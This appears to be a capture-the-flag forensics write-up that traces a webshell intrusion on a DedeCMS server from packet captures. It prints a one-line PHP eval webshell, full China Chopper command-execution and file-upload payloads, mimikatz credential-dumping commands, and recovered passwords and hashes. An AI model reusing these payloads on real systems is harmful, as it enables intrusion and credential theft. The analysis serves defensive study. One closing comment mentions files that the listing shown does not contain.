Information Security Triathlon (信息安全铁人三项赛) Finals, Data Track, Problem 4




All problems: https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md



The capture shows someone running a directory scan, which is enough to pin down a likely attacker and victim:

Attacker: 172.16.10.110
Victim: 192.168.20.117

First, filter out all the packets between these two hosts.

PS:
Once the attacker and victim are known, pulling out all the packets between them right away seems the more reliable way to go.

#!/bin/bash
#attack_dump.sh
# Extract every packet involving the attacker or the victim from each capture file.

target_folder='attack'

mkdir -p "${target_folder}"

# Glob instead of parsing `ls`, and quote the file name so odd names survive.
for file in *.pcap; do
   echo "Dumping attack packets in ${file}..."
   # -w writes raw packets, so -A (print as ASCII) would have no effect here; -s 0 keeps full frames.
   # Note: 'host A or host B' keeps everything either host touched; use 'host A and host B'
   # if you want only the traffic between the two.
   tcpdump -s 0 -r "$file" -w "${target_folder}/${file}" 'host 172.16.10.110 or host 192.168.20.117'
   echo "${file} Done!"
done

The same pass also gives me the HTTP traffic as text (the http.txt searched below); grepping that text is still the quickest way in.

First, grep straight away for a one-line webshell (a "小马"):

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

Oddly, though, it is served as a plain text file (Content-Type: text/plain)?


Scrolling up and down from there, a real webshell in use turned up.


The webshell traffic has some distinctive features, for instance:

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

(A forged Baiduspider User-Agent on a POST, together with an array_map wrapper in the body, is the classic fingerprint of the China Chopper (中国菜刀) client; the X@Y delimiters and the z0/z1 parameters in the decoded payloads below come from the same tool.)

Search on these features:

grep -n -C 5 'spider.html' http.txt | grep 'POST '

Sure enough, two webshells turn up:

/9.php
/uploadfile/2017/0905/20170905055411283.php

My guess is that both shells were written through a vulnerability. Search for the first place 9.php appears.


Searching for /admin/file_manage_control.php shows the target is DedeCMS (织梦CMS). The technique used should be the one described here:

http://www.cnblogs.com/LittleHann/p/4237578.html

So the attacker first used the above to write 9.php to the server. Note that file_manage_control.php is the DedeCMS backend file manager, so this step needs an authenticated admin session, which is why the login traffic matters below.


Searching for the other shell, however, shows it being used straight away, with no request that creates it on this host, and its file name is a timestamp. That points to a file upload vulnerability.

From the request details (the POST to index.php?m=member&c=index&a=register&siteid=1 seen above) I found this article:

http://0day5.com/archives/4368/ (phpcms v9 front-end GetShell)
The exploit needs a remote file, 1.txt, that the target can fetch.

Tracing further back:

The attacker wrote 1.txt through 9.php.


Going further back still: to have DedeCMS write 9.php the attacker needed the admin password, so presumably there was a brute-force attempt beforehand. Count the POST targets:

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c

It turns out the attacker essentially already knew the backend password: there is no brute forcing, just one direct login.


gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
(URL-decoded; sm1=%B5%C7%C2%BC is the GBK encoding of the submit button label 登录)
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=登录

Username: admin
Password: 19901109
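To make that count repeatable, here is an added Python example (mine, not the original author's code) that does what the grep/awk/sort/uniq pipeline above does and then applies the check one otherwise does by eye: flag any endpoint hit often enough to look like guessing, and decode the DedeCMS login body, which is posted as GBK (that is what the %B5%C7%C2%BC bytes are). The dump it runs on is constructed, and the login URI /admin/login.php is an assumption, since the page shows only the form body, not the request line.

```python
"""Count POST targets in a tcpdump -A text dump and pull the admin login out."""
import re
from collections import Counter
from urllib.parse import parse_qs

POST_LINE = re.compile(r"^POST (\S+) HTTP/1\.[01]", re.M)

# Constructed dump in the shape of the writeup's http.txt: one DedeCMS login
# (URI assumed), two backend file-manager hits and a dozen webshell POSTs.
LOGIN_BODY = ("gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms"
              "&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC")
SAMPLE_DUMP = "\n".join(
    ["POST /admin/login.php HTTP/1.1", "Host: 192.168.20.117", "", LOGIN_BODY]
    + ["POST /admin/file_manage_control.php HTTP/1.1", "Host: 192.168.20.117", ""] * 2
    + ["POST /9.php HTTP/1.1", "Host: 192.168.20.117", "", "t=array_map..."] * 12
) + "\n"


def post_counts(dump):
    """Same numbers as `grep 'POST ' | ... | sort | uniq -c`, keyed by request URI."""
    return Counter(POST_LINE.findall(dump))


def repeated_targets(counts, threshold):
    """Endpoints hit at least `threshold` times, busiest first."""
    return [(uri, n) for uri, n in counts.most_common() if n >= threshold]


def login_attempts(dump):
    """Every DedeCMS login form in the dump, decoded as GBK (the gbk build posts GBK bytes)."""
    attempts = []
    for line in dump.splitlines():
        if "dopost=login" not in line:
            continue
        form = parse_qs(line, encoding="gbk")
        attempts.append({"userid": form["userid"][0], "pwd": form["pwd"][0],
                         "button": form.get("sm1", [""])[0]})
    return attempts


def assess(dump, threshold=10):
    """Brute-force verdict: many login posts means guessing; a single one means the password was known."""
    counts = post_counts(dump)
    attempts = login_attempts(dump)
    return {
        "repeated": repeated_targets(counts, threshold),
        "login_attempts": len(attempts),
        "credentials": sorted({(a["userid"], a["pwd"]) for a in attempts}),
        "brute_forced": len(attempts) >= threshold,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_DUMP))
```

Only the login endpoint count answers the brute-force question; the busiest endpoint in this kind of capture is usually the webshell itself, so a raw "most hits" sort needs that second look.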

There are several ways the attacker could have arrived at the password without guessing:
possibly SQL injection that returned the admin password,
possibly social engineering,
possibly a sensitive information leak, and so on.

On closer inspection it probably was not an ordinary (visible) injection,
because the password string cannot be found anywhere else in the capture.


I also tried to check for blind injection...
...but, limited by my skill, could not work anything out.

Next, let us see what the attacker did with the two shells, starting with 9.php:

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Collect OS version, current user and similar host information
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\ (repeat)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Collect OS version, current user and similar host information (repeat)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command ipconfig (the output is GBK; tcpdump -A prints the non-ASCII bytes as dots, hence the dotted labels here and in the systeminfo output below)
Windows IP Configuration

Ethernet adapter ........:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command systeminfo
// (field labels restored in English from the standard systeminfo layout; values that were non-ASCII are left as dots)
Host Name:                 WANGGUAN-C938A1
OS Name:                   Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          ..........
OS Build Type:             Uniprocessor Free
Registered Owner:          wangguan
Registered Organization:
Product ID:                91353-645-7659413-50864
Original Install Date:     2017-8-29, 10:14:19
System Up Time:            0 days 2 hours 55 minutes 11 seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS Version:              UNKNOWN
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;....(....)
Input Locale:              zh-cn;....(....)
Time Zone:                 (GMT+08:00) ....................................
Total Physical Memory:     1,023 MB
Available Physical Memory: 379 MB
Virtual Memory: Max Size:  2,299 MB
Virtual Memory: Available: 1,854 MB
Virtual Memory: In Use:    445 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\WANGGUAN-C938A1
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: ........
                                 DHCP Enabled:    ..
                                 DHCP Server:     192.168.20.1
                                 IP address(es)
                                 [01]: 192.168.20.117
[S]

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a local file (hex-encoded in z1) and save it as C:\phpStudy\WWW\mimikatz.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\ (checking the upload landed)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit, appending the output to C:\phpStudy\WWW\log.txt
// i.e. dump the logon credentials cached in LSASS to a file on the web root

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\ (checking that log.txt exists)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Read the file C:\phpStudy\WWW\log.txt (the mimikatz output):
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
User Name         : Administrator
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read C:\phpStudy\WWW\log.txt again (fread variant)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as C:\phpStudy\WWW\DTools.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\data\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the file C:\phpStudy\WWW\data\common.inc.php (the DedeCMS database configuration)
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Read C:\phpStudy\WWW\data\common.inc.php again (readfile variant); it holds the database credentials:
<?php                    
//..............            
$cfg_dbhost = 'localhost';  
$cfg_dbname = 'dedecms';    
$cfg_dbuser = 'root';       
$cfg_dbpwd = 'root';        
$cfg_dbprefix = 'dede_';    
$cfg_db_language = 'gbk';                               
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as C:\phpStudy\WWW\data\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\WWW\data\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run 22.exe from C:\phpStudy\WWW\ (it was saved under data\, so the next request retries with the full path)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run C:\phpStudy\WWW\data\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as C:\Hscan....zip (the rest of the file name is non-ASCII and is mangled in the dump)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\phpStudy\

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload the same file again, saved as C:\Hscan....zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file under C:\ (note that lcx.exe and the Hscan archive have now appeared):
Documents and Settings/  2017-08-30 10:26:49 0   0777
phpStudy/   2017-08-29 11:16:35 0   0777
Program Files/  2017-08-29 10:19:09 0   0555
Program Files (x86)/    2017-08-29 10:10:05 0   0555
RECYCLER/   2017-08-29 11:24:41 0   0777
System Volume Information/  2017-08-29 10:15:42 0   0777
WINDOWS/    2017-09-05 17:50:05 0   0777
wmpub/  2017-08-29 10:11:11 0   0777
